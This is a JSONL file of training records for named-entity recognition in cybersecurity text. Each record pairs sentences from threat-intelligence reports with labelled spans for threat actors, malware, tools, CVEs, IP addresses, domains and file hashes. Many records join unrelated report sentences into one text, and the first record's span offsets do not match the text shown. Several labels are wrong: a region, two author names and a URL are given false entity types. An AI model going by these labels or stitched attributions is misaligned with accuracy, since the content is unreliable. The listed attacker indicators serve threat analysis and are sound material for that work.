None : While OT - oriented malware families can be purpose built for a particular target environment , malware that takes advantage of insecure by design OT protocols , such as LIGHTWORK ’s abuse of the IEC-104 protocol , can be modified and employed multiple times to target multiple victims .", "spans": {"SYSTEM: Android": [[33, 40]], "ORGANIZATION: Check Point": [[79, 90]], "TOOL: installers": [[133, 143]], "TOOL: loaders": [[146, 153]], "TOOL: uninstallers": [[160, 172]], "THREAT_ACTOR: Lazarus Group": [[329, 342]], "MALWARE: Pupy RAT": [[345, 353]], "MALWARE: Backdoor.Patpoopy": [[356, 373]], "MALWARE: LIGHTWORK ’s": [[620, 632]], "VULNERABILITY: IEC-104 protocol": [[646, 662]]}, "info": {"id": "cyberner_stix_train_001747", "source": "cyberner_stix_train"}} {"text": "Once PoisonIvy was installed , it contacted a C&C server on TCP port 80 using an encrypted communication protocol .", "spans": {"MALWARE: PoisonIvy": [[5, 14]], "TOOL: C&C": [[46, 49]]}, "info": {"id": "cyberner_stix_train_001748", "source": "cyberner_stix_train"}} {"text": "Since Ginp is already using some code from the Anubis Trojan , it is quite likely that other , more advanced features from Anubis or other malware , such as a back-connect proxy , screen-streaming and RAT will also be added in the future . In early 2017 , APT10 began conducting attacks against global managed IT service providers (MSPs) that granted them unprecedented access to MSPs and their customers’ networks . 
In July 2016 , we identified a compromised website in Japan that was hosting a Daserf variant .", "spans": {"MALWARE: Anubis": [[47, 53]], "SYSTEM: Anubis": [[123, 129]], "THREAT_ACTOR: APT10": [[256, 261]], "ORGANIZATION: IT service": [[310, 320]], "ORGANIZATION: (MSPs)": [[331, 337]], "MALWARE: Daserf variant": [[496, 510]]}, "info": {"id": "cyberner_stix_train_001749", "source": "cyberner_stix_train"}} {"text": "The payload uses the Android Accessibility Service to get information directly from the displayed elements on the screen , so it waits for the targeted application to be launched and then parses all nodes to find text messages : Note that the implant needs special permission to use the Accessibility Service API , but there is a command that performs a request with a phishing text displayed to the user to obtain such permission . We refer to this campaign and the associated actor as Operation Kingphish Malik” , in one of its written forms in Arabic , translates to King” . Strider : ProjectSauron . Strider is a threat group that has been active since at least 2011 and has targeted victims in Russia , China , Sweden , Belgium , Iran , and Rwanda .", "spans": {"SYSTEM: Android": [[21, 28]], "THREAT_ACTOR: Operation Kingphish": [[487, 506]], "THREAT_ACTOR: Strider": [[578, 585], [604, 611]], "THREAT_ACTOR: ProjectSauron .": [[588, 603]]}, "info": {"id": "cyberner_stix_train_001750", "source": "cyberner_stix_train"}} {"text": "The dropped file ( officeupdate.exe ) is then executed by the macro code using the PowerShell script . 
njRAT is a Remote Access Tool ( RAT ) used mostly by the actor groups in the middle east .", "spans": {"FILEPATH: officeupdate.exe": [[19, 35]], "TOOL: macro code": [[62, 72]], "TOOL: PowerShell script": [[83, 100]], "MALWARE: njRAT": [[103, 108]], "TOOL: Remote Access Tool": [[114, 132]], "MALWARE: RAT": [[135, 138]]}, "info": {"id": "cyberner_stix_train_001751", "source": "cyberner_stix_train"}} {"text": "Those apps use the same techniques to monetize their actions . Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks . Taiwanese citizens will go to the polls on January 16 , 2016 , to choose a new President and legislators . There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns .", "spans": {"ORGANIZATION: government": [[150, 160]], "SYSTEM: Cisco Secure protections": [[356, 380]], "THREAT_ACTOR: the types of spam": [[408, 425]]}, "info": {"id": "cyberner_stix_train_001752", "source": "cyberner_stix_train"}} {"text": "This analysis will be revisited below , along with an examination of two other PUTTER PANDA tools : pngdowner and httpclient . 
These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[79, 91]], "TOOL: pngdowner": [[100, 109]], "TOOL: httpclient": [[114, 124]], "FILEPATH: Softether VPN 4.12”": [[192, 211]], "FILEPATH: psiphon3”": [[216, 225]], "FILEPATH: Microsoft Office activators”": [[231, 259]]}, "info": {"id": "cyberner_stix_train_001753", "source": "cyberner_stix_train"}} {"text": "The Dukes primarily use spear-phishing emails when attempting to infect victims with their malware .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]], "TOOL: emails": [[39, 45]]}, "info": {"id": "cyberner_stix_train_001754", "source": "cyberner_stix_train"}} {"text": "First , it creates a new directory : “ %LOCAL_APPDATA%\\Microsoft\\Windows ” .", "spans": {"SYSTEM: %LOCAL_APPDATA%\\Microsoft\\Windows": [[39, 72]]}, "info": {"id": "cyberner_stix_train_001755", "source": "cyberner_stix_train"}} {"text": "Near the end of February , CrowdStrike Intelligence observed another incident in which similar manual lateral movement techniques were used to deploy GandCrab across multiple hosts in an enterprise . However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[27, 51]], "TOOL: GandCrab": [[150, 158]], "ORGANIZATION: technology": [[210, 220]], "ORGANIZATION: Symantec": [[273, 281]], "ORGANIZATION: pharmaceutical firms": [[350, 370]]}, "info": {"id": "cyberner_stix_train_001756", "source": "cyberner_stix_train"}} {"text": "If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . 
ALLANITE uses email phishing campaigns and compromised websites called watering holes to steal credentials and gain access to target networks , including collecting and distributing screenshots of industrial control systems .", "spans": {"MALWARE: document": [[7, 15]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "VULNERABILITY: CVE-2013-3906": [[80, 93]], "VULNERABILITY: CVE-2014-1761": [[97, 110]], "MALWARE: compromised websites": [[221, 241]]}, "info": {"id": "cyberner_stix_train_001757", "source": "cyberner_stix_train"}} {"text": "Cyber Espionage in the Middle East : The Cybereason Nocturnus team has discovered several recent , targeted attacks in the Middle East .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[41, 61]], "TOOL: Middle East": [[123, 134]]}, "info": {"id": "cyberner_stix_train_001758", "source": "cyberner_stix_train"}} {"text": "All of these targets are large corporations that play a major role in India ’s economy .", "spans": {}, "info": {"id": "cyberner_stix_train_001759", "source": "cyberner_stix_train"}} {"text": "The threat actors use the Hunter and nbtscan tools , sometimes renamed , to conduct network reconnaissance for vulnerable servers and online systems .", "spans": {"TOOL: Hunter": [[26, 32]], "TOOL: nbtscan": [[37, 44]]}, "info": {"id": "cyberner_stix_train_001760", "source": "cyberner_stix_train"}} {"text": "Unlike the simplistic MiniDuke toolset , CozyDuke is a highly versatile , modular , malware “ platform ” whose functionality lies not in a single core component but in an array of modules that it may be instructed to download from its C&C server .", "spans": {"MALWARE: MiniDuke": [[22, 30]], "MALWARE: CozyDuke": [[41, 49]], "TOOL: C&C": [[235, 238]]}, "info": {"id": "cyberner_stix_train_001761", "source": "cyberner_stix_train"}} {"text": "b45defca452a640b303288131eb64c485f442aae0682a3c56489d24d59439b47 d9601735d674a9e55546fde0bffde235bc5f2546504b31799d874e8c31d5b6e9 
2ce54d93510126fca83031f9521e40cd8460ae564d3d927e17bd63fb4cb20edc 67b1a1e7b505ac510322b9d4f4fc1e8a569d6d644582b588faccfeeaa4922cb7 APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making . FTP server was not accessible any more at the time of our . “ It appears to be the email address Will used for his profiles , ” the IT director replied .", "spans": {"THREAT_ACTOR: APT33": [[260, 265]], "ORGANIZATION: aviation": [[278, 286]], "ORGANIZATION: military": [[350, 358], [435, 443]], "THREAT_ACTOR: Will": [[573, 577]], "ORGANIZATION: IT director": [[608, 619]]}, "info": {"id": "cyberner_stix_train_001762", "source": "cyberner_stix_train"}} {"text": "DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": {"TOOL: DarkPulsar": [[0, 10]], "TOOL: backdoor": [[81, 89]], "MALWARE: sipauth32.tsp": [[98, 111]], "THREAT_ACTOR: ScarCruft": [[223, 232]], "VULNERABILITY: zero-day": [[266, 274]]}, "info": {"id": "cyberner_stix_train_001763", "source": "cyberner_stix_train"}} {"text": "It ’s interesting to note that this version of SPLM implements communications that are fully encrypted over HTTPS .", "spans": {"MALWARE: SPLM": [[47, 51]]}, "info": {"id": "cyberner_stix_train_001764", "source": "cyberner_stix_train"}} {"text": "TG-3390 : 72.11.141.133 .", "spans": {"THREAT_ACTOR: TG-3390": [[0, 7]], "IP_ADDRESS: 72.11.141.133": [[10, 23]]}, "info": {"id": "cyberner_stix_train_001765", "source": "cyberner_stix_train"}} {"text": "Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers . 
PLEAD also uses CVE-2017-7269 , a buffer overflow vulnerability Microsoft Internet Information Services ( IIS ) 6.0 to compromise the victim 's server .", "spans": {"MALWARE: Neptun": [[0, 6]], "THREAT_ACTOR: attackers": [[108, 117]], "VULNERABILITY: CVE-2017-7269": [[136, 149]], "ORGANIZATION: Microsoft": [[184, 193]], "TOOL: Internet Information Services": [[194, 223]], "TOOL: IIS": [[226, 229]]}, "info": {"id": "cyberner_stix_train_001766", "source": "cyberner_stix_train"}} {"text": "The malware now targets more countries all over the world by masquerading as official post office and transportation services apps . In a case in June 2019 , we also noticed Warzone RAT being used . DLL hijacking techniques have been seen in the past with the APT15 group .", "spans": {"MALWARE: Warzone RAT": [[174, 185]], "THREAT_ACTOR: APT15 group": [[260, 271]]}, "info": {"id": "cyberner_stix_train_001767", "source": "cyberner_stix_train"}} {"text": "The malware uses fake version information to appear as a Microsoft update program , as well as Google Desktop once unpacked .", "spans": {"TOOL: fake version information": [[17, 41]], "ORGANIZATION: Microsoft": [[57, 66]], "TOOL: Google Desktop once unpacked": [[95, 123]]}, "info": {"id": "cyberner_stix_train_001768", "source": "cyberner_stix_train"}} {"text": "In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[60, 70]], "MALWARE: TRITON": [[106, 112]]}, "info": {"id": "cyberner_stix_train_001769", "source": "cyberner_stix_train"}} {"text": "SHA256 : ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8 SHA256 : 12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8 SHA256 : cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7 SHA256 : 23411bb30042c9357ac4928dc6fca6955390361e660fec7ac238bbdcc8b83701 Sofacy : Cdnverify.net Sofacy Filename : 
Upcoming_Events_February_2018.xls .", "spans": {"FILEPATH: ff808d0a12676bfac88fd26f955154f8884f2bb7c534b9936510fd6296c543e8": [[9, 73]], "FILEPATH: 12e6642cf6413bdf5388bee663080fa299591b2ba023d069286f3be9647547c8": [[83, 147]], "FILEPATH: cb85072e6ca66a29cb0b73659a0fe5ba2456d9ba0b52e3a4c89e86549bc6e2c7": [[157, 221]], "FILEPATH: 23411bb30042c9357ac4928dc6fca6955390361e660fec7ac238bbdcc8b83701": [[231, 295]], "THREAT_ACTOR: Sofacy": [[296, 302], [319, 325]], "DOMAIN: Cdnverify.net": [[305, 318]], "FILEPATH: Upcoming_Events_February_2018.xls": [[337, 370]]}, "info": {"id": "cyberner_stix_train_001770", "source": "cyberner_stix_train"}} {"text": "Finally , it is worth noting that the Dukes are known to sometimes re-infect a victim of one of their malware tools with another one of their tools .", "spans": {"THREAT_ACTOR: Dukes": [[38, 43]]}, "info": {"id": "cyberner_stix_train_001771", "source": "cyberner_stix_train"}} {"text": "] 923915 [ . Compared to other backdoor tools associated with the Sofacy group , the use of Zebrocy in attack campaigns is far more widespread . For example the subject in all the samples was a combination of a US state and a common first name ( like Utah Erick or Tennessee Dayna ) . 
Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": {"TOOL: backdoor tools": [[31, 45]], "THREAT_ACTOR: Sofacy group": [[66, 78]], "TOOL: Zebrocy": [[92, 99]], "THREAT_ACTOR: fraudsters": [[290, 300]]}, "info": {"id": "cyberner_stix_train_001772", "source": "cyberner_stix_train"}} {"text": "During multiple intrusions , the threat actors employed various tools and techniques to understand the network environments .", "spans": {}, "info": {"id": "cyberner_stix_train_001773", "source": "cyberner_stix_train"}} {"text": "The BRONZE PRESIDENT intrusions observed by CTU researchers appear to have taken place over several months or years .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[4, 20]], "ORGANIZATION: CTU": [[44, 47]]}, "info": {"id": "cyberner_stix_train_001775", "source": "cyberner_stix_train"}} {"text": "On initial inspection , the content appears to be the expected legitimate content , however , closer examination of the document shows several abnormal artifacts that would not exist in a legitimate document .", "spans": {}, "info": {"id": "cyberner_stix_train_001776", "source": "cyberner_stix_train"}} {"text": "Sandworm Team may have opted for a ' hide in plain sight ' approach to evade detections from rootkit scanners , such as GMER and RootkitRevealer , that checks for system anomalies . 
Russian citizens—journalists , software developers , politicians , researchers at universities , and artists are also targeted by Pawn Storm .", "spans": {"THREAT_ACTOR: Sandworm Team": [[0, 13]], "ORGANIZATION: citizens—journalists": [[190, 210]], "ORGANIZATION: software developers": [[213, 232]], "ORGANIZATION: politicians": [[235, 246]], "ORGANIZATION: researchers at universities": [[249, 276]], "ORGANIZATION: artists": [[283, 290]], "THREAT_ACTOR: Pawn Storm": [[312, 322]]}, "info": {"id": "cyberner_stix_train_001777", "source": "cyberner_stix_train"}} {"text": "Lured Into Deploying a Backdoor : The attackers use specially crafted lure content to trick targets into opening malicious files that infect the victim ’s machine with a backdoor .", "spans": {}, "info": {"id": "cyberner_stix_train_001778", "source": "cyberner_stix_train"}} {"text": "These artifacts indicate that FakeSpy 's campaign is still live and under development . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc , and can act as a keylogger . Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor .", "spans": {"MALWARE: FakeSpy": [[30, 37]], "MALWARE: AveMaria": [[98, 106]], "THREAT_ACTOR: Ke3chang": [[331, 339]], "ORGANIZATION: ESET": [[352, 356]]}, "info": {"id": "cyberner_stix_train_001779", "source": "cyberner_stix_train"}} {"text": "Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack . 
Our investigation also led to the discovery of dozens of email addresses registered by Turla operators for this campaign and used to receive exfiltrated data from the victims .", "spans": {"THREAT_ACTOR: Spring Dragon group": [[14, 33]], "VULNERABILITY: spearphish exploits": [[60, 79]], "TOOL: email": [[195, 200]], "THREAT_ACTOR: Turla": [[225, 230]]}, "info": {"id": "cyberner_stix_train_001780", "source": "cyberner_stix_train"}} {"text": "After the payload is extracted , decrypted , and mapped in the process memory , the malware calls the new DLL entry point , and then the RunDll exported function . To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . There is no proper DLL injection routine – the payload is just decompressed to the memory as-is – so the malware needs to fix all the pointers in the decompressed code , which is done on a one-by-one basis using hardcoded values and offsets . The output is then executed using and the return value is checked to determine the functions return value , if it is 0 , return 0 if not , it will call twice", "spans": {"THREAT_ACTOR: hacker": [[184, 190]], "THREAT_ACTOR: Behzad Mesri": [[193, 205], [413, 425]], "THREAT_ACTOR: Turk Black Hat": [[221, 235]], "THREAT_ACTOR: ArYaIeIrAn": [[247, 257]], "TOOL: PersianDNS": [[321, 331]], "TOOL: Mahanserver": [[334, 345]], "ORGANIZATION: Facebook": [[394, 402]], "TOOL: DLL": [[450, 453]]}, "info": {"id": "cyberner_stix_train_001781", "source": "cyberner_stix_train"}} {"text": "Then it executes an additional command based on the contents of this file .", "spans": {}, "info": {"id": "cyberner_stix_train_001782", "source": "cyberner_stix_train"}} {"text": "Beside the obfuscation and the environment checks , the malware also has some interesting anti-sandbox mechanisms . 
MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call \" POWERSTATS \" . Unfortunately at the time of discovery , the hosted file is unavailable . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": {"TOOL: PowerShell-based first stage backdoor": [[185, 222]], "TOOL: POWERSTATS": [[233, 243]]}, "info": {"id": "cyberner_stix_train_001783", "source": "cyberner_stix_train"}} {"text": "During the account sign-up process , Google may flag the account creation attempt as suspicious and prompt the app to solve a CAPTCHA . The attackers first researched desired targets and then sent an email specifically to the target . Other groups have used legitimate websites to host C2 IP address in the past . On Feb 12th 2013 , FireEye announced the discovery of an Adobe Reader 0 - day exploit which is used to drop a previously unknown , advanced piece of malware .", "spans": {"ORGANIZATION: Google": [[37, 43]], "TOOL: C2": [[286, 288]], "ORGANIZATION: FireEye": [[333, 340]], "VULNERABILITY: Adobe Reader 0 - day exploit": [[371, 399]]}, "info": {"id": "cyberner_stix_train_001784", "source": "cyberner_stix_train"}} {"text": "URLs go-microstf.com . 69.87.223.26:8080/eiloShaegae1 . 
go-microstf.com/checkfile.aspx .", "spans": {"IP_ADDRESS: URLs go-microstf.com": [[0, 20]], "IP_ADDRESS: 69.87.223.26:8080/eiloShaegae1": [[23, 53]], "IP_ADDRESS: go-microstf.com/checkfile.aspx": [[56, 86]]}, "info": {"id": "cyberner_stix_train_001785", "source": "cyberner_stix_train"}} {"text": "FormBook OverviewFormBook is a data stealer and form grabber that has been advertised in various hacking forums since early 2016 . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"TOOL: FormBook OverviewFormBook": [[0, 25]], "ORGANIZATION: Central Bank 's Automated Workstation Client": [[221, 265]], "ORGANIZATION: ATMs": [[270, 274]]}, "info": {"id": "cyberner_stix_train_001786", "source": "cyberner_stix_train"}} {"text": "The C2 server will then provide a secondary payload to the beacon in ASCII hexadecimal representation , which the Trojan will decode and write to the following location : %APPDATA%\\Roaming\\Audio\\soundfix.exe .", "spans": {"TOOL: C2": [[4, 6]], "TOOL: ASCII": [[69, 74]], "MALWARE: Trojan": [[114, 120]], "FILEPATH: %APPDATA%\\Roaming\\Audio\\soundfix.exe": [[171, 207]]}, "info": {"id": "cyberner_stix_train_001787", "source": "cyberner_stix_train"}} {"text": "upload , download , load modules , get screenshot .", "spans": {}, "info": {"id": "cyberner_stix_train_001788", "source": "cyberner_stix_train"}} {"text": "AntSword is a modular webshell that involves a very simple webshell that the actor would deploy to the compromised server and a client application referred to as the AntSword Shell Manager .", "spans": {"TOOL: AntSword": [[0, 8], [166, 174]], "TOOL: Shell Manager": [[175, 188]]}, "info": {"id": "cyberner_stix_train_001789", "source": "cyberner_stix_train"}} {"text": "In June 26 2019 a group called “ Green Leakers ” on telegram published screenshots of the C2 admin panel as you can see below along with screenshot of 
the muddyc3 c2 source code . they announced that they are selling all the leaked tools for 0.5BTC .", "spans": {"THREAT_ACTOR: Green Leakers": [[33, 46]], "TOOL: C2": [[90, 92]], "TOOL: muddyc3": [[155, 162]], "TOOL: c2": [[163, 165]]}, "info": {"id": "cyberner_stix_train_001790", "source": "cyberner_stix_train"}} {"text": "ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . If it did , the malware downloaded additional modules , including ones allowing for the automatic creation of unauthorized payment orders , changing details in legal payment orders , etc .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "MALWARE: sample": [[36, 42]], "THREAT_ACTOR: OceanLotus": [[52, 62]]}, "info": {"id": "cyberner_stix_train_001791", "source": "cyberner_stix_train"}} {"text": "upAppinfos function used for obtaining the device IMEI and all of its installed applications . The finding shows that EvilGnome operates on an IP address that was controlled by the Gamaredon group two months ago . it is a typical first stage backdoor commonly found in APT attacks .", "spans": {"TOOL: EvilGnome": [[118, 127]], "THREAT_ACTOR: Gamaredon group": [[181, 196]]}, "info": {"id": "cyberner_stix_train_001792", "source": "cyberner_stix_train"}} {"text": "SectorJ04 used the spear phishing email to spread malicious Excel or malicious Word files , and downloaded the MSI files from the attacker’s server when the malicious documents were run . Interestingly , while most Blue Lambert variants have version numbers in the range of 2.x , Green Lambert is mostly in 3.x versions .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "THREAT_ACTOR: attacker’s": [[130, 140]], "MALWARE: Blue Lambert": [[215, 227]], "MALWARE: Green Lambert": [[280, 293]]}, "info": {"id": "cyberner_stix_train_001793", "source": "cyberner_stix_train"}} {"text": "Make sure that all other apps installed and the device operating systems are updated to the latest version . 
Gorgon Group used common URL shortening services to download payloads . jnz in JZMapper ) The PDFs used highly relevant , well - crafted content that fabricated human rights seminar information and Ukraine ’s foreign policy and NATO membership plans , and were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": {"THREAT_ACTOR: Gorgon Group": [[109, 121]], "TOOL: JZMapper": [[188, 196]], "TOOL: Adobe Reader versions 9 , 10 and 11": [[401, 436]]}, "info": {"id": "cyberner_stix_train_001794", "source": "cyberner_stix_train"}} {"text": "Sophos detects all the samples of this Trojan family as Andr/Banker-GWC and Andr/Spybot-A . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . microcode data structures , I Enabled PowerShell Logging and Transcript logging that get the full PowerShell session with the output .", "spans": {"ORGANIZATION: Sophos": [[0, 6]], "THREAT_ACTOR: APT38": [[154, 159]], "ORGANIZATION: financial institutions": [[195, 217]]}, "info": {"id": "cyberner_stix_train_001795", "source": "cyberner_stix_train"}} {"text": "id=eu.chainfire.supersu ) tool 246.us us.x SuperSU ELF binaries supersu.cfg supersu.cfg.ju supersu.cfg.old SuperSU configs with spyware implant mention bb.txt BusyBox v1.26.2 ELF file bdata.xml Config file for excluding malware components from Android battery saver feature Doze bdatas.apk Main implant module com.android.network.irc.apk Start implant module MobileManagerService.apk ASUS firmware system component ( clean ) mobilemanager.apk The malware uses a custom binary protocol to beacon back to the command and control ( C2 ) server , often via TCP port 8080 or 8088 , with some payloads implementing Secure Socket Layer ( SSL ) encryption to obfuscate communications . APT33 : 91.235.142.124 mywinnetwork.ddns.net . 
If you can understand why a hacker hacks their motivations a little more clearly , along with who is most likely to be targeting your specific organization , you can bolster your defenses and be ready for whatever the threat landscape throws your way .", "spans": {"SYSTEM: Android": [[244, 251]], "ORGANIZATION: ASUS": [[384, 388]], "TOOL: custom binary protocol": [[462, 484]], "TOOL: beacon": [[488, 494]], "TOOL: Secure Socket Layer": [[609, 628]], "TOOL: SSL": [[631, 634]], "ORGANIZATION: communications": [[661, 675]], "THREAT_ACTOR: APT33": [[678, 683]], "IP_ADDRESS: 91.235.142.124": [[686, 700]], "DOMAIN: mywinnetwork.ddns.net": [[701, 722]], "THREAT_ACTOR: hacker": [[753, 759]]}, "info": {"id": "cyberner_stix_train_001796", "source": "cyberner_stix_train"}} {"text": "The majority of samples connect to a domain ; however one subset of samples connected directly to the IP address 204.74.215.58 , which belonged to the Chinese QQ user mentioned previously and was also associated with antivirus-groups.com . .", "spans": {"IP_ADDRESS: 204.74.215.58": [[113, 126]], "TOOL: QQ": [[159, 161]], "DOMAIN: antivirus-groups.com": [[217, 237]]}, "info": {"id": "cyberner_stix_train_001797", "source": "cyberner_stix_train"}} {"text": "The malware toolset used for this campaign was the previously unseen CloudDuke and we believe that the July campaign marks the first time that this toolset was deployed by the Dukes , other than possible small-scale testing .", "spans": {"MALWARE: CloudDuke": [[69, 78]], "THREAT_ACTOR: Dukes": [[176, 181]]}, "info": {"id": "cyberner_stix_train_001798", "source": "cyberner_stix_train"}} {"text": "Beyond the previously mentioned DroidVPN example , other viable embedded apps we found include apps currently available on Google Play , as well as many third-party app stores . At Gameforge , the Winnti hackers had already been removed from the networks when a staff member noticed a Windows start screen with Chinese characters . 
APT17 was embedding the encoded CnC IP address for the BLACKCOFFEE malware in legitimate Microsoft TechNet profiles pages and forum threads , a method some in the information security community call a \" dead drop resolver \" .", "spans": {"SYSTEM: Google Play": [[123, 134]], "ORGANIZATION: Gameforge": [[181, 190]], "THREAT_ACTOR: Winnti": [[197, 203]], "THREAT_ACTOR: APT17": [[332, 337]], "MALWARE: BLACKCOFFEE": [[387, 398]], "MALWARE: malware": [[399, 406]], "ORGANIZATION: Microsoft": [[421, 430]], "ORGANIZATION: information security community": [[495, 525]]}, "info": {"id": "cyberner_stix_train_001799", "source": "cyberner_stix_train"}} {"text": "The technique of hosting malicious code in legitimate sites like Pastebin has advantages and it is highly unlikely to trigger any suspicion in security monitoring and also can bypass reputation based devices .", "spans": {"TOOL: Pastebin": [[65, 73]]}, "info": {"id": "cyberner_stix_train_001800", "source": "cyberner_stix_train"}} {"text": "The package name ( vyn.hhsdzgvoexobmkygffzwuewrbikzud ) and its many activities and services have randomized names , probably to make it a bit more difficult to detect the package using blacklisting . After monitoring and correlating the APT attack , 360 Threat Intelligence Center discovered multiple related emails to attack Colombian government agencies , financial institutions and large enterprises . While other techniques are also utilized to conceal and inhibit its removal , ZxShell ’s primary functionality is to act as a Remote Administration Tool ( RAT ) , allowing the threat actor to have continuous backdoor access on to the compromised machine . 
The problem is that CSP does n't support query strings ( See Spec ):", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[251, 281]], "ORGANIZATION: government agencies": [[337, 356]], "ORGANIZATION: financial institutions": [[359, 381]], "ORGANIZATION: enterprises": [[392, 403]], "MALWARE: ZxShell": [[484, 491]], "TOOL: Remote Administration Tool": [[532, 558]], "TOOL: RAT": [[561, 564]], "MALWARE: backdoor": [[614, 622]], "VULNERABILITY: CSP does n't support query strings": [[682, 716]]}, "info": {"id": "cyberner_stix_train_001801", "source": "cyberner_stix_train"}} {"text": "The Hillary for America presidential campaign owns the hillaryclinton.com domain , which is used for the campaign website ( www.hillaryclinton.com ) and for email addresses used by campaign staff .", "spans": {"DOMAIN: hillaryclinton.com": [[55, 73]], "DOMAIN: www.hillaryclinton.com": [[124, 146]], "TOOL: email": [[157, 162]]}, "info": {"id": "cyberner_stix_train_001802", "source": "cyberner_stix_train"}} {"text": "The samples we have seen had their configuration set to delay displaying the first ad by 24 minutes after the device unlocks . Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day . 
This document contains the name , phone number and email address of members of agencies , embassies and organizations linked to North Korea .", "spans": {"ORGANIZATION: Kaspersky": [[127, 136]], "THREAT_ACTOR: BlackOasis’": [[159, 170]], "VULNERABILITY: zero day": [[236, 244]], "TOOL: email": [[298, 303]]}, "info": {"id": "cyberner_stix_train_001803", "source": "cyberner_stix_train"}} {"text": "The malware operates on victims' systems as a svchost-based service and is capable of downloading executables , changing its own configuration , updating its own binaries , terminating its own processes , and activating and terminating denial-of-service attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_001804", "source": "cyberner_stix_train"}} {"text": "These file creation times conform to a work schedule typical of an actor operating within a UTC+3 time zone supporting a proximity to Moscow .", "spans": {}, "info": {"id": "cyberner_stix_train_001806", "source": "cyberner_stix_train"}} {"text": "This entry was posted on Tue Nov 28 14:00 EST 2017 and filed under Malware , Sandor Nemes , Malware Analysis , and Abhay Vaish . 
For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer .", "spans": {"TOOL: Sandor Nemes": [[77, 89]], "TOOL: Malware Analysis": [[92, 108]], "TOOL: Abhay Vaish": [[115, 126]], "MALWARE: DropIt": [[157, 163]], "FILEPATH: cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671": [[182, 246]], "FILEPATH: %TEMP%\\flash_update.exe": [[308, 331]], "MALWARE: Flash Player installer": [[356, 378]]}, "info": {"id": "cyberner_stix_train_001807", "source": "cyberner_stix_train"}} {"text": "To activate this menu the operator needs to call the hardcoded number “ 9909 ” from the infected device : A hidden menu then instantly appears on the device display : The operator can use this interface to type any command for execution . Therefore , it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer . APT33 : 8.26.21.120 mynetwork.ddns.net . Analysis into the malware and its functionality reveals that its capabilities are comparable to those employed in previous incidents and malware , such as and , which were both malware variants deployed in the past to impact electricity transmission and distribution via IEC-104 .", "spans": {"TOOL: HIDDEN COBRA malware": [[282, 302]], "TOOL: Volgmer": [[361, 368]], "THREAT_ACTOR: APT33": [[371, 376]], "IP_ADDRESS: 8.26.21.120": [[379, 390]], "DOMAIN: mynetwork.ddns.net": [[391, 409]]}, "info": {"id": "cyberner_stix_train_001808", "source": "cyberner_stix_train"}} {"text": "Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others . 
